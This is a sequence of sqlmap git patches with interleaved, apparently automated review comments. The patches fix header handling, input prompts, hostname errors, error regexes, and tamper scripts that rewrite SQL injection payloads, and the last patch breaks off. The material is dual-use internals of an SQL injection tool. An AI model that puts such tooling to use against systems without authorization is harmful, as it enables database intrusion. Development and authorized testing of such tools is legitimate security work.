From: Miroslav Stampar Date: Wed, 28 Nov 2018 23:09:13 +0100 Subject: [PATCH 368/428] Fixes #3389 --- lib/core/common.py | 5 +++++ lib/core/option.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8da52c896d9..75e3db096c0 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -997,6 +997,11 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = None kb.stickyLevel = None + if kb.lastInputMessage == message: + checkBatch = False + else: + kb.lastInputMessage = message + message = getUnicode(message) if "\n" in message: diff --git a/lib/core/option.py b/lib/core/option.py index 288213acfcc..a55a9a8bb25 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1795,6 +1795,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.injection = InjectionDict() kb.injections = [] kb.laggingChecked = False + kb.lastInputMessage = None kb.lastParserStatus = None kb.locks = AttribDict() diff --git a/lib/core/settings.py b/lib/core/settings.py index af0dd39dace..5b532aea1ae 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.17" +VERSION = "1.2.11.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a24e0c0860a..10f852c8d91 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
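Review bot: The added `if kb.lastInputMessage == message:` block changes what `checkBatch` means for any prompt that repeats the previous one, and nothing in the hunk says why; a comment such as `# Same prompt as last time: do not let --batch answer it again, so a question that keeps coming back reaches the user instead of looping` would save the next reader a trip to #3389 (wording to be confirmed against the issue). The comparison runs before `message = getUnicode(message)`, so it compares the raw argument with the raw argument stored last time, which is consistent; only the immediately preceding prompt is remembered, so alternating prompts are unaffected. readInput()'s body continues outside the hunk.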
@@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -eb4e54c194d50d9dc8caa1a3ea69cba6 lib/core/common.py +9ed51d3e770b5cec2f8c91e962011d52 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -c6a8223fbc1dad784d4ae6377e737a97 lib/core/option.py +a24992df012aee6d5617808f1dbb70ec lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3f8cf314028234cb8c60c66a915da2e2 lib/core/settings.py +c0d7976aabdffc78b22a9e63f3a51683 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py From 560ff4154b88893a6a36b415c4ed877944723309 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Nov 2018 00:09:05 +0100 Subject: [PATCH 369/428] Fixes #3388 (and refactors #1578) --- lib/controller/controller.py | 1 + lib/core/option.py | 17 ++++------------- lib/core/settings.py | 3 ++- lib/request/connect.py | 24 ++++++++++++++---------- txt/checksum.md5 | 8 ++++---- 5 files changed, 25 insertions(+), 28 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index c63d7862a6b..9cdc3534d1c 100644 
--- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -313,6 +313,7 @@ def start(): conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) + conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])] initTargetEnv() parseTargetUrl() diff --git a/lib/core/option.py b/lib/core/option.py index a55a9a8bb25..95fd7e7cbdc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -102,6 +102,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS +from lib.core.settings import DEFAULT_USER_AGENT from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import KB_CHARS_BOUNDARY_CHAR @@ -112,7 +113,6 @@ from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT -from lib.core.settings import SITE from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS @@ -122,7 +122,6 @@ from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING from lib.core.threads import getCurrentThreadData from lib.core.threads import setDaemon from lib.core.update import update 
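Review bot: The new de-duplication keeps only the last entry per header name, so any intentionally repeated header (a request file can carry the same name twice) is silently reduced to its final value; if override-by-target is the intended semantics, a comment above the line such as `# drop earlier duplicates so per-target headers override the initial ones` would spare the next reader the guessing. Style-wise the index loop and the `__` throwaway name obscure a plain filter: `conf.httpHeaders = [header for i, header in enumerate(conf.httpHeaders) if header[0].upper() not in (other[0].upper() for other in conf.httpHeaders[i + 1:])]`. start()'s body continues outside the hunk on both sides.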
@@ -1256,14 +1255,6 @@ def _setHTTPExtraHeaders(): # Reference: http://stackoverflow.com/a/1383359 conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - def _setHTTPUserAgent(): """ Set the HTTP User-Agent header. @@ -1308,7 +1299,7 @@ def _setHTTPUserAgent(): break if _: - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) else: if not kb.userAgents: @@ -1323,10 +1314,10 @@ def _setHTTPUserAgent(): warnMsg += "file '%s'" % paths.USER_AGENTS logger.warn(warnMsg) - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) return - userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0] + userAgent = random.sample(kb.userAgents or [DEFAULT_USER_AGENT], 1)[0] infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent infoMsg += "file '%s'" % paths.USER_AGENTS diff --git a/lib/core/settings.py b/lib/core/settings.py index 5b532aea1ae..3ec3feaf467 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,12 +19,13 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.18" +VERSION = "1.2.11.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" SITE = "http://sqlmap.org" +DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE) DEV_EMAIL_ADDRESS = "dev@sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" diff --git a/lib/request/connect.py b/lib/request/connect.py index 056baa71645..8d46dbc7f6e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -89,6 +89,7 @@ class WebSocketException(Exception): from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.settings import DEFAULT_USER_AGENT from lib.core.settings import EVALCODE_KEYWORD_SUFFIX from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE 
@@ -361,14 +362,21 @@ def getPage(**kwargs): if kb.proxyAuthHeader: headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader - if not getHeader(headers, HTTP_HEADER.ACCEPT): - headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE + if not conf.requestFile or not target: + if not getHeader(headers, HTTP_HEADER.HOST): + headers[HTTP_HEADER.HOST] = getHostHeader(url) - if not getHeader(headers, HTTP_HEADER.HOST) or not target: - headers[HTTP_HEADER.HOST] = getHostHeader(url) + if not getHeader(headers, HTTP_HEADER.ACCEPT): + headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" + if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" + + elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT: + for header in headers: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + del headers[header] + break if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) @@ -385,10 +393,6 @@ def getPage(**kwargs): if conf.keepAlive: headers[HTTP_HEADER.CONNECTION] = "keep-alive" - # Reset header values to original in case of provided request file - if target and conf.requestFile: - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie}) - if auxHeaders: headers = forgeHeaders(auxHeaders, headers) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 10f852c8d91..b054da5c7ae 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
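Review bot: In the `elif` branch the `conf.requestFile` test is redundant, because the preceding `if not conf.requestFile or not target` fails only when both `conf.requestFile` and `target` are true, so `elif getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT:` says the same thing. More substantively, request-file targets now also skip the `Host` fallback, so a file without a `Host:` line is left to the underlying HTTP library's default (presumably derived from the URL); if that is relied upon it deserves a comment, since the block removed in the next hunk used to re-forge headers at this point. The `for header in headers: … del headers[header]; break` loop is safe only because of the `break`, so a one-line comment, `# drop sqlmap's own default UA when replaying a request file`, would explain both the intent and the early exit. getPage continues outside the hunk.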
@@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py -dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py +95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -a24992df012aee6d5617808f1dbb70ec lib/core/option.py +7dacc178910ab4d57de36c3602bde17d lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c0d7976aabdffc78b22a9e63f3a51683 lib/core/settings.py +9f209388d9fed41480e57c8574d0111a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py 
@@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -0113525b321d0d35cf973a9cff34850a lib/request/connect.py +77b24c30b1a2163add76652998e74127 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From e7ed2bbcbba0bbde42ddcf373cf5048b8ad1d19e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 30 Nov 2018 11:29:17 +0100 Subject: [PATCH 370/428] Fixes #3391) --- tamper/plus2concat.py | 5 +++++ tamper/plus2fnconcat.py | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index 574a2082850..113315b9b3c 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -41,6 +41,9 @@ def tamper(payload, **kwargs): retVal = payload if payload: + prefix, suffix = '+' * len(re.search(r"\A(\+*)", payload).group(0)), '+' * len(re.search(r"(\+*)\Z", payload).group(0)) + retVal = retVal.strip('+') + while True: indexes = zeroDepthSearch(retVal, '+') @@ -76,4 +79,6 @@ def tamper(payload, **kwargs): else: break + retVal = "%s%s%s" % (prefix, retVal, suffix) + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 86ceee621ca..bc85826f8ff 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -42,6 +42,9 @@ def tamper(payload, **kwargs): retVal = payload if payload: + prefix, suffix = '+' * len(re.search(r"\A(\+*)", payload).group(0)), '+' * len(re.search(r"(\+*)\Z", payload).group(0)) + retVal = retVal.strip('+') + while True: indexes = zeroDepthSearch(retVal, '+') @@ -89,4 +92,6 @@ def tamper(payload, **kwargs): else: break + retVal = "%s%s%s" % (prefix, retVal, suffix) + return retVal 
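Review bot: When the payload consists only of `+` characters, both `prefix` and `suffix` capture the whole string and `retVal.strip('+')` leaves nothing, so the second hunk reassembles the plus run doubled; a guard before computing them, `if not payload.strip('+'): return payload`, keeps such an edge-case input untouched. The same four lines are pasted into both tamper/plus2concat.py and tamper/plus2fnconcat.py; length arithmetic on `payload.lstrip('+')`/`payload.rstrip('+')` (or a small shared helper) would express the intent without two regexes, and the hunk assumes `re` is already imported in both modules, which is not visible here. Both tamper() bodies extend beyond the hunks.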
From 0ce2128a9b9c1a0d6a753fa5d16ad18d70062390 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 22:40:44 +0100 Subject: [PATCH 371/428] Fixes #3394 --- lib/core/agent.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 48bf658a1bd..f95e92dddeb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -920,7 +920,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): elif Backend.isDbms(DBMS.HSQLDB): match = re.search(r"ORDER BY [^ ]+", limitedQuery) if match: - limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery = re.sub(r"\s*%s\s*" % re.escape(match.group(0)), " ", limitedQuery).strip() limitedQuery += " %s" % match.group(0) if query.startswith("SELECT "): From 536d9a597ecad4a7a300ac92126b229d9ad834fb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 22:59:46 +0100 Subject: [PATCH 372/428] Minor language update --- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 08399cca49b..773824250d2 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -332,7 +332,7 @@ def errorUse(expression, dump=False): stopLimit = int(count) infoMsg = "used SQL query returns " - infoMsg += "%d entries" % stopLimit + infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and not count.isdigit(): diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 795443b86e7..7e68fb2d01b 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py 
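Review bot: Escaping the matched text fixes the literal re-substitution, but the match itself, `ORDER BY [^ ]+`, stops at the first space, so with `ORDER BY col DESC` or `ORDER BY a, b` only `ORDER BY col` / `ORDER BY a,` is moved to the end and the `DESC` / `b` is left stranded mid-query. If such forms can reach limitQuery for HSQLDB, widen the pattern, e.g. `r"ORDER BY [^ ]+(?: (?:ASC|DESC))?"`, or document the single-column assumption next to it. limitQuery's body continues outside the hunk.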
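Review bot: `"entries" if stopLimit > 1 else "entry"` prints `0 entry` when the count is zero; `stopLimit != 1` yields the right word for every value. The same expression is added to lib/techniques/union/use.py in this commit and should change in both places. Whether a zero count can reach this branch (`int(count)` is computed just above) is not visible in the hunk, so this may be purely cosmetic. The enclosing function continues outside the hunk.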
@@ -258,7 +258,7 @@ def unionUse(expression, unpack=True, dump=False): stopLimit = int(count) infoMsg = "used SQL query returns " - infoMsg += "%d entries" % stopLimit + infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): From 65f227fe6534eef78baa81f1c90ceadd442b261c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:07:13 +0100 Subject: [PATCH 373/428] Bug fix (privately reported: --technique=E --where='id=1') --- lib/techniques/error/use.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 773824250d2..76f2e84b412 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -444,8 +444,11 @@ def errorThread(): if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = unArrayizeValue(value) + if value and isListLike(value): + if len(value) == 1 and isinstance(value[0], basestring): + value = unArrayizeValue(value) + elif len(value) > 1 and stopLimit == 1: + value = [value] duration = calculateDeltaSeconds(start) From 843126702da64e36ca5046b9db28b59dfa97e94d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:12:45 +0100 Subject: [PATCH 374/428] Fixes #3392 --- lib/controller/checks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 69e03c5cd34..aee960b6282 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
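Review bot: The new `elif len(value) > 1 and stopLimit == 1: value = [value]` branch reads as a shape fix, but nothing says which case it handles; a comment such as `# single row with several columns (e.g. --where narrowing the query to one entry): wrap it so the caller still sees a list of rows` would stop the next maintainer from simplifying it away. Whether `stopLimit` is always bound when `value` is non-empty cannot be seen from the hunk (it is presumably assigned earlier in errorUse, outside the view), so that assumption is worth confirming. The enclosing function continues outside the hunk.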
@@ -1530,7 +1530,7 @@ def checkConnection(suppressOutput=False): except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) - except socket.error, ex: + except (socket.error, UnicodeError), ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) From 101d1f0d497dd435cbf6165a966801d69745f228 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:18:52 +0100 Subject: [PATCH 375/428] Fixes #3395 --- lib/controller/checks.py | 7 ++++++- lib/core/option.py | 8 +++++++- 2 files changed, 13 insertions(+), 2 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index aee960b6282..104aeec9e52 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -70,6 +70,7 @@ from lib.core.enums import PLACE from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException @@ -1530,10 +1531,14 @@ def checkConnection(suppressOutput=False): except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) - except (socket.error, UnicodeError), ex: + except socket.error, ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) + except UnicodeError, ex: + errMsg = "problem occurred while " + errMsg += "handling a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) + raise SqlmapDataException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: infoMsg = "testing connection to the target URL" 
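Review bot: Turning `UnicodeError` into a `SqlmapDataException` gives a clearer message, but the likely source of that error here is an IDN (non-ASCII) hostname reaching the resolver, which is a legitimate target rather than bad data; if the resolver call in the `try` (outside the hunk) takes the raw name, encoding it first with `conf.hostname.encode("idna")` would let such hosts work instead of aborting. The two messages also differ in a single word ("resolving" vs "handling"), so a short comment on why the unicode case is classified as a data problem rather than a connection problem would help. checkConnection continues outside the hunk.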
diff --git a/lib/core/option.py b/lib/core/option.py index 95fd7e7cbdc..8081e34626c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -82,6 +82,7 @@ from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import WIZARD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapInstallationException @@ -1364,7 +1365,12 @@ def _setHostname(): """ if conf.url: - conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + try: + conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + except ValueError, ex: + errMsg = "problem occurred while " + errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex)) + raise SqlmapDataException(errMsg) def _setHTTPTimeout(): """ From 66d26f67bfa20c13a2d2e1a80fbe2b4a7900ecb7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Dec 2018 10:06:31 +0100 Subject: [PATCH 376/428] Manual tagging (automatic tagging failed for some reason) --- lib/core/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ec3feaf467..e6136207bb4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.19" +VERSION = "1.2.12.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) From f04584bb68b10cde7d0d3a82b5bf0395e6960ebf Mon Sep 17 00:00:00 2001 
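Review bot: `urlparse.urlsplit(conf.url).netloc.split(':')[0]` still mishandles two valid URL shapes that pass the new `ValueError` guard: an IPv6 literal such as `http://[::1]:8080/` yields `[`, and a userinfo prefix such as `http://user:pw@host/` yields `user`. `urlparse.urlsplit(conf.url).hostname` handles both (it strips brackets and credentials) at the cost of lower-casing the name, which is presumably fine for a hostname but worth confirming against how conf.hostname is compared elsewhere. Also, `"parsing an URL"` should read `"parsing a URL"`.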
From: Miroslav Stampar Date: Fri, 7 Dec 2018 11:22:53 +0100 Subject: [PATCH 377/428] Update of error message regexes --- xml/errors.xml | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/xml/errors.xml b/xml/errors.xml index e8001c3b937..02e529e7f66 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -11,8 +11,8 @@ - + @@ -24,6 +24,9 @@ + + + @@ -36,13 +39,14 @@ - + - + + @@ -61,9 +65,10 @@ - + + @@ -72,12 +77,14 @@ + + @@ -86,6 +93,7 @@ + @@ -98,12 +106,16 @@ + + + + @@ -120,6 +132,7 @@ + @@ -130,14 +143,13 @@ - + - From 070e17306721baae2c0034f610061e147740ae28 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 12:59:13 +0100 Subject: [PATCH 378/428] Another patch for #3389 (Fixes #3397) --- lib/core/common.py | 5 ----- lib/core/option.py | 1 - lib/takeover/metasploit.py | 15 ++------------- 3 files changed, 2 insertions(+), 19 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 75e3db096c0..8da52c896d9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -997,11 +997,6 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = None kb.stickyLevel = None - if kb.lastInputMessage == message: - checkBatch = False - else: - kb.lastInputMessage = message - message = getUnicode(message) if "\n" in message: diff --git a/lib/core/option.py b/lib/core/option.py index 8081e34626c..499cefb0b0e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1792,7 +1792,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.injection = InjectionDict() kb.injections = [] kb.laggingChecked = False - kb.lastInputMessage = None kb.lastParserStatus = None kb.locks = AttribDict() diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 8a8c0b74d45..356eba16acf 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py 
@@ -168,19 +168,8 @@ def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): choice = readInput(message, default="%d" % default) - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) + if not choice or not choice.isdigit() or int(choice) > maxValue or int(choice) < 1: + choice = default choice = int(choice) From 4f1b0787ed70deba6b3f76bf28adf3a7393b8cfa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:04:53 +0100 Subject: [PATCH 379/428] Commit hooks were disabled --- lib/core/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e6136207bb4..b1f28eb9838 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.0" +VERSION = "1.2.12.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) From ef911b6be4e5e2e07cca731192943b4000e3b158 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:10:01 +0100 Subject: [PATCH 380/428] Dummy commit (just to test hooks) --- lib/core/common.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8da52c896d9..820a881f9a6 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
